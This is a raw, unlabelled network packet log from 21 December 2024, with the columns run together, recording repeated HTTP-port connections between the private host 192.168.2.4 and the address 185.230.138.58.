                                                                                                                                        Dec 21, 2024 10:09:07.684536934 CET8049971185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:07.718128920 CET4997080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:07.733007908 CET4997180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:08.285917997 CET4997080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:08.289416075 CET4997180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:08.289733887 CET4997380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:08.405899048 CET8049970185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:08.405958891 CET4997080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:08.409281969 CET8049973185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:08.409353018 CET4997380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:08.409372091 CET8049971185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:08.409419060 CET4997180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:08.409636974 CET4997380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:08.529119968 CET8049973185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:08.764177084 CET4997380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:08.883774042 CET8049973185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:09.653371096 CET8049973185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:09.812009096 CET4997380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:09.888840914 CET8049973185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:10.009737015 CET4997380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:10.010056973 CET4997980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:10.129542112 CET8049979185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:10.129632950 CET4997980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:10.129813910 CET4997980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:10.130103111 CET8049973185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:10.130165100 CET4997380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:10.249304056 CET8049979185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:10.483067989 CET4997980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:10.602869034 CET8049979185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:11.375648975 CET8049979185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:11.514147043 CET4997980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:11.608587980 CET8049979185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:11.728488922 CET4998580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:11.828023911 CET4997980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:11.848191977 CET8049985185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:11.848391056 CET4998580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:11.850169897 CET4998580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:11.969775915 CET8049985185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:12.201738119 CET4998580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:12.321611881 CET8049985185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:12.563098907 CET4998680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:12.564625025 CET4998580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:12.683911085 CET8049986185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:12.683976889 CET4998680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:12.684247971 CET4998680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:12.732461929 CET8049985185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:12.805327892 CET8049986185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:12.819399118 CET8049985185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:12.819502115 CET4998580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:12.985328913 CET4999180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:13.032830000 CET4998680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:13.105223894 CET8049991185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:13.105318069 CET4999180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:13.105540037 CET4999180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:13.152528048 CET8049986185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:13.152544022 CET8049986185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:13.225104094 CET8049991185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:13.451713085 CET4999180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:13.572139025 CET8049991185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:13.934361935 CET8049986185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:14.014168024 CET4998680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:14.168579102 CET8049986185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:14.311037064 CET4998680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:14.352902889 CET8049991185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:14.420403004 CET4999180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:14.588644028 CET8049991185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:14.712516069 CET4997980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:14.715522051 CET4998680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:14.715642929 CET4999180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:14.715699911 CET4999380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:14.835942030 CET8049993185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:14.835961103 CET8049986185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:14.836009979 CET4999380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:14.836049080 CET4998680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:14.836165905 CET4999380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:14.836503029 CET8049991185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:14.836568117 CET4999180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:14.955672026 CET8049993185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:15.191886902 CET4999380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:15.311528921 CET8049993185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:16.082333088 CET8049993185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:16.123548031 CET4999380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:16.316699982 CET8049993185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:16.316950083 CET4999380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:16.434210062 CET4999880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:16.436934948 CET8049993185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:16.436996937 CET4999380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:16.554034948 CET8049998185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:16.554124117 CET4999880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:16.554306984 CET4999880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:16.673862934 CET8049998185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:16.905229092 CET4999880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:17.024787903 CET8049998185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:17.798044920 CET8049998185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:17.896132946 CET4999880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:18.032675982 CET8049998185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:18.124223948 CET4999880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:18.431217909 CET4999880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:18.431732893 CET5000280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:18.551362038 CET8049998185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:18.551399946 CET8050002185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:18.551441908 CET4999880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:18.551517010 CET5000280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:18.551650047 CET5000280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:18.671221018 CET8050002185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:18.906344891 CET5000280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:19.025912046 CET8050002185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:19.171281099 CET5000280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:19.171361923 CET5000680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:19.291014910 CET8050006185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:19.291309118 CET5000680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:19.291310072 CET5000680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:19.294154882 CET5000880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:19.336641073 CET8050002185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:19.411094904 CET8050006185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:19.413990021 CET8050008185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:19.414079905 CET5000880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:19.414319992 CET5000880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:19.522428036 CET8050002185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:19.522594929 CET5000280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:19.535146952 CET8050008185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:19.643573046 CET5000680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:19.763211966 CET8050006185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:19.763266087 CET8050006185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:19.765413046 CET5000880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:19.885265112 CET8050008185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:20.539236069 CET8050006185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:20.623667002 CET5000680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:20.661012888 CET8050008185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:20.772918940 CET8050006185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:20.811113119 CET5000880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:20.896784067 CET8050008185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:20.920536041 CET5000680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:21.021444082 CET5000880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:21.021473885 CET5000680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:21.022275925 CET5001280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:21.141758919 CET8050008185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:21.141901016 CET5000880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:21.161401987 CET8050006185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:21.161458015 CET8050012185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:21.161608934 CET5000680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:21.161731958 CET5001280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:21.162374973 CET5001280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:21.282011986 CET8050012185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:21.514483929 CET5001280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:21.635090113 CET8050012185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:22.410541058 CET8050012185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:22.479182005 CET5001280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:22.648855925 CET8050012185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:22.649118900 CET5001280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:22.770553112 CET8050012185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:22.774307013 CET5001280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:23.070931911 CET5001680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:23.190737963 CET8050016185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:23.190841913 CET5001680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:23.191066027 CET5001680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:23.310719013 CET8050016185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:23.545593977 CET5001680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:23.665709019 CET8050016185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:24.438186884 CET8050016185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:24.514273882 CET5001680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:24.672782898 CET8050016185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:24.794389963 CET5001680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:24.794673920 CET5002280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:24.914520979 CET8050016185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:24.914587975 CET5001680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:24.914613008 CET8050022185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:24.914707899 CET5002280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:24.914875984 CET5002280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:25.034852028 CET8050022185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:25.264586926 CET5002280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:25.384448051 CET8050022185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:25.786448956 CET5002780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:25.786803007 CET5002280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:25.906477928 CET8050027185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:25.906821966 CET5002780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:25.906970978 CET5002780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:25.914895058 CET8050022185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:25.915129900 CET5002280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:25.932322979 CET5002880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:26.027301073 CET8050027185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:26.053303957 CET8050028185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:26.053414106 CET5002880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:26.053566933 CET5002880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:26.173178911 CET8050028185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:26.264537096 CET5002780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:26.384275913 CET8050027185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:26.384357929 CET8050027185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:26.405004025 CET5002880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:26.524848938 CET8050028185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:27.157991886 CET8050027185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:27.217437983 CET5002780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:27.313674927 CET8050028185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:27.358056068 CET5002880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:27.397006035 CET8050027185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:27.514381886 CET5002780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:27.540658951 CET8050028185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:27.596174002 CET5002880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:27.667164087 CET5002880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:27.667165995 CET5002780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:27.668090105 CET5003280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:27.787467003 CET8050027185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:27.787651062 CET8050032185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:27.787760019 CET5002780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:27.787760019 CET5003280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:27.787962914 CET5003280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:27.788150072 CET8050028185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:27.792253017 CET5002880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:27.907604933 CET8050032185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:28.149534941 CET5003280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:28.270073891 CET8050032185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:29.041585922 CET8050032185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:29.092441082 CET5003280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:29.276726961 CET8050032185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:29.326822042 CET5003280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:29.403896093 CET5003680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:29.523456097 CET8050036185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:29.523600101 CET5003680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:29.523732901 CET5003680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:29.644385099 CET8050036185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:29.874876022 CET5003680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:29.994745970 CET8050036185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:30.768599033 CET8050036185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:30.904970884 CET5003680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:31.004739046 CET8050036185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:31.121207952 CET5003680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:31.121212006 CET5004280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:31.241024971 CET8050042185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:31.241133928 CET5004280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:31.241240025 CET8050036185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:31.241272926 CET5004280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:31.241393089 CET5003680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:31.360940933 CET8050042185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:31.592593908 CET5004280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:31.712172031 CET8050042185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:32.406018972 CET5004780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:32.406044960 CET5004280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:32.494343042 CET8050042185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:32.494393110 CET5004280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:32.525990009 CET8050047185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:32.526073933 CET5004780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:32.526191950 CET5004780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:32.526201963 CET8050042185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:32.526247978 CET5004280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:32.531647921 CET5004880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:32.531887054 CET5003280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:32.645668030 CET8050047185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:32.651276112 CET8050048185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:32.651338100 CET5004880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:32.651525021 CET5004880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:32.771078110 CET8050048185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:32.873960018 CET5004780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:32.993774891 CET8050047185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:32.994038105 CET8050047185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:32.998924017 CET5004880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:33.119014978 CET8050048185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:33.773911953 CET8050047185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:33.895138979 CET8050048185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:33.905421972 CET5004780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:33.936229944 CET5004880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:34.009092093 CET8050047185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:34.116513014 CET5004780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:34.129435062 CET8050048185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:34.170604944 CET5004880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:34.252260923 CET5004780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:34.252306938 CET5004880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:34.252856016 CET5005180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:34.372282982 CET8050047185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:34.372349024 CET5004780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:34.372555017 CET8050051185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:34.372615099 CET5005180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:34.372772932 CET5005180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:34.372803926 CET8050048185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:34.372848988 CET5004880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:34.492307901 CET8050051185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:34.717638016 CET5005180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:34.837373972 CET8050051185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:35.624749899 CET8050051185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:35.676273108 CET5005180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:35.856745005 CET8050051185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:35.906316996 CET5005180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:35.984289885 CET5005580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:36.103898048 CET8050055185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:36.103974104 CET5005580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:36.104141951 CET5005580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:36.223579884 CET8050055185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:36.452003956 CET5005580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:36.571665049 CET8050055185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:37.350306034 CET8050055185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:37.408287048 CET5005580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:37.584825993 CET8050055185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:37.702341080 CET5005580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:37.702465057 CET5006180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:37.822019100 CET8050061185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:37.822242975 CET5006180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:37.822438002 CET5006180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:37.822529078 CET8050055185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:37.826419115 CET5005580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:37.941843033 CET8050061185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:38.170901060 CET5006180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:38.290389061 CET8050061185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:39.015549898 CET5006680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.015861034 CET5006180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.074352026 CET8050061185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:39.078468084 CET5006180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.135298967 CET8050066185.230.138.58192.168.2.4
